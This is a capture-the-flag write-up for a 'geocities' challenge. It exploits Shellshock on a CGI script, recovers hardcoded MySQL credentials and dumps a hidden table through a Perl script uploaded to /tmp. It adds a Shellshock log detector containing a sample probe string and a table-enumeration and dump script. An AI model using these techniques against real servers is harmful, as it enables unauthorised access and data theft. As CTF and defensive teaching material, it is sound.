I recently stumbled onto this old geocities site (http://geocities.vuln.icec.tf/), it’s a miracle that it’s still up! It must be running some ancient technology and probably hasn’t been updated in years, it’s our lucky day boys!
After analyzing the website I didn’t find anything until I started reading the messages, where there were some hints: the blog posts talked about websites made in Perl and Bash, so I started thinking there might be some CGI scripts on the website. I tried to find any particular file in the cgi-bin folder but found nothing, until I did the most obvious thing, which was trying to access “http://geocities.vuln.icec.tf/index.cgi”, and it existed! Now let’s try some ShellShock with curl, which gave us the source of the script:
    use DBI;

    my $dbh = DBI->connect(
        "dbi:mysql:dbname=geocities;host=icectf_mariadb",
        "geocities", "geocities",
        { RaiseError => 1 },
    ) or die $DBI::errstr;

    # Newest posts first; columns 1..3 of each row are printed ';'-separated.
    my $sth = $dbh->prepare("SELECT * from Posts ORDER BY post_date DESC");
    $sth->execute();

    my $row;
    while ($row = $sth->fetchrow_arrayref()) {
        print "$row->[1];$row->[2];$row->[3]\n";
    }

    $sth->finish();
    $dbh->disconnect();
Oh, a Perl script that connects to a SQL database; maybe our flag is somewhere in that database! But first we need to access it. After this I tried a reverse shell, but it wasn’t working, so I just tried to access MySQL with the command-line client, since we already had the credentials from the source above, but it failed to execute even when trying the most common locations of the mysql binary (maybe the admins removed it for security reasons for the user running the website). Then I thought of replicating the Perl script above, sending it to the /tmp folder and executing it.
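From the defender’s side, the request that retrieved index.cgi above is easy to spot: a CGI server copies request headers such as User-Agent into the script’s environment, and the Shellshock prefix “() {” in a header value is exactly what a vulnerable bash mis-parses. The following Perl script is an added example (not part of this write-up) that flags such requests in access-log lines; the three log lines are constructed for the example.

```perl
#!/usr/bin/perl
# Added example (not from the original write-up): flag HTTP requests whose
# quoted fields carry the Shellshock function-definition prefix "() {".
# A CGI server exports headers such as User-Agent into the environment of
# the script, so an unpatched bash would parse that prefix as a function.
use strict;
use warnings;

# Matches "() {" with optional whitespace: the start of an exported bash
# function definition, which is what Shellshock abuses.
my $SHELLSHOCK_RE = qr/\(\s*\)\s*\{/;

# Returns the list of log lines that contain the prefix anywhere.
sub flag_shellshock_lines {
    my @lines = @_;
    return grep { $_ =~ $SHELLSHOCK_RE } @lines;
}

# Constructed sample access-log lines (combined log format, made up here).
my @sample = (
    '10.0.0.5 - - [01/Jan/2016:10:00:00 +0000] "GET /index.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2016:10:00:01 +0000] "GET /index.cgi HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '10.0.0.7 - - [01/Jan/2016:10:00:02 +0000] "GET /about.html HTTP/1.1" 200 88 "-" "curl/7.47.0"',
);

my @hits = flag_shellshock_lines(@sample);
printf "%d of %d sample lines carry the Shellshock prefix\n",
    scalar @hits, scalar @sample;
print "  $_\n" for @hits;
```

Run against the constructed sample it reports the second line only. The real fix is a patched bash, which no longer imports function definitions from arbitrary environment variables; the log check is useful for finding probes against hosts that were not patched in time.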
The first thing I had to do was to find out the names of the other SQL tables; this is easy with a SELECT on the information_schema tables:
So we have two database tables, one named Posts and the other named 47a6fd2ca39d2b0d6eea1c30008dd889; now we only need to select everything from this one and see if the flag is in it:
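The stand-alone script described in the last two steps, as an added example rather than the challenge’s own index.cgi: it connects with the details shown in the recovered source, enumerates the tables of the geocities schema through information_schema, and then dumps one table chosen from that list. Since table names cannot be bound as placeholders, the name is accepted only if it came back from the enumeration and is quoted with DBI’s quote_identifier, which also covers names that start with digits like the second table above. It assumes DBI and DBD::mysql are installed.

```perl
#!/usr/bin/perl
# Added example (not the challenge's own index.cgi): list the tables of the
# "geocities" schema via information_schema, then dump one of them.
# Connection details are the ones shown in the recovered index.cgi source.
use strict;
use warnings;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities", "geocities",
    { RaiseError => 1, PrintError => 0 },
) or die $DBI::errstr;

# List table names for a schema. information_schema.tables is the portable
# way to enumerate tables; the schema name is bound as a placeholder.
sub list_tables {
    my ($dbh, $schema) = @_;
    my $sth = $dbh->prepare(
        "SELECT table_name FROM information_schema.tables WHERE table_schema = ?"
    );
    $sth->execute($schema);
    my @names = map { $_->[0] } @{ $sth->fetchall_arrayref };
    $sth->finish;
    return @names;
}

# Dump every row of one table. Identifiers cannot be bound as placeholders,
# so the name is only accepted if it came back from list_tables, and it is
# quoted with quote_identifier so that a name starting with digits is still
# a valid identifier in the generated SQL.
sub dump_table {
    my ($dbh, $schema, $table) = @_;
    my %known = map { $_ => 1 } list_tables($dbh, $schema);
    die "unknown table '$table' in schema '$schema'\n" unless $known{$table};

    my $sth = $dbh->prepare("SELECT * FROM " . $dbh->quote_identifier($table));
    $sth->execute;

    # Column names come from the statement handle, so the header line is
    # correct whatever the table layout is.
    print join(";", @{ $sth->{NAME} }), "\n";
    while (my $row = $sth->fetchrow_arrayref) {
        print join(";", map { defined $_ ? $_ : "NULL" } @$row), "\n";
    }
    $sth->finish;
}

my $schema = "geocities";
my @tables = list_tables($dbh, $schema);
print "tables in $schema: @tables\n";

# Table to dump comes from the command line; the write-up's second table was
# 47a6fd2ca39d2b0d6eea1c30008dd889. Defaults to Posts.
my $target = @ARGV ? shift @ARGV : "Posts";
dump_table($dbh, $schema, $target);

$dbh->disconnect;
```

Usage: `perl dump.pl 47a6fd2ca39d2b0d6eea1c30008dd889`. The same script, run from a host with legitimate access, is also the quickest way for the site’s operators to confirm what data a leaked read-only account like this one actually exposes.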